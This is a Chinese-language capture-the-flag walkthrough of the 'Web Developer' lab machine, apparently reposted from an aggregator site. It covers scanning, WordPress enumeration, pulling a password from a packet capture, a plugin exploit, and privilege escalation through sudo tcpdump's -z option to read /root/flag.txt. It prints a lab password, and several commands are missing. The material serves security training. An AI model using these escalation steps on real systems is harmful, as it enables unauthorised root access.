概述
获取靶机Web Developer文件/root/flag.txt中的flag过程:
- 1.发现目标,找到WebDeveloper的ip地址
- 2.利用NMAP扫描目标主机,发现目标主机端口开放、服务情况
- 3.若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站
- 4.利用whatweb探测目标网站使用的CMS模板
- 5.网络搜索wpscan,简要说明其功能
- 6.使用 Dirb 爆破网站目录
- 浏览器访问该目录(路径),发现了一个cap文件
- 7.利用Wireshark分析该数据包,分析TCP数据流
- 8.通过上一步得到的信息后进去网站的后台
- 9.利用该CMS存在的(插件Plugin)漏洞并提升权限
- 10.SSH登录服务器
1.发现目标,找到WebDeveloper的ip地址
通过nmap直接对本计所在的网段进行扫描:
发现目标主机的IP为:192.168.91.132
2.利用NMAP扫描目标主机,发现目标主机端口开放、服务情况
通过第一次的扫描我们发现目标主机的端口开放情况:
22端口 ssh协议
80端口 http协议
3.若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站
4.利用whatweb探测目标网站使用的CMS模板
通过命令:
找到
5.网络搜索wpscan,简要说明其功能
- WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。
- 该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。
扫描指定站点:
wpsacn --url http://www.xxxxx.com/
例如
结果:
6.使用 Dirb 爆破网站目录
浏览器访问该目录(路径),发现了一个cap文件
7.利用Wireshark分析该数据包,分析TCP数据流
通过wireshark打开后,在过滤框中输入:
http.request.method==POST
得到
打开后发现:账号 webdeveloper和密码 Te5eQg&4sBS!Yr$)wf%(DcAd
8.通过上一步得到的信息后进去网站的后台
9.利用该CMS存在的(插件Plugin)漏洞并提升权限
下载完成后
多出来这个图标:
打开后,找到 wp-config.php,后直接打开即可得到用户名和密码
10.SSH登录服务器
通过ssh命令:
ssh webdeveloper@192.168.91.132
然后通过命令:
发现可以通过root权限执行tcpdump命令
创建攻击文件:
touch /tmp/exploit
写入shellcode
echo "cat /root/flag.txt" > /tmp/exploit
赋予可执行权限
chmod +x /tmp/exploit
利用tcpdump执行任意命令
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
获得flag
tcpdump中的一些命令:
-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行
-w指定的转储
-W [num] 指定抓包数量
最后
以上就是安静路灯为你收集整理的CTF实战的全部内容,希望文章能够帮你解决CTF实战所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复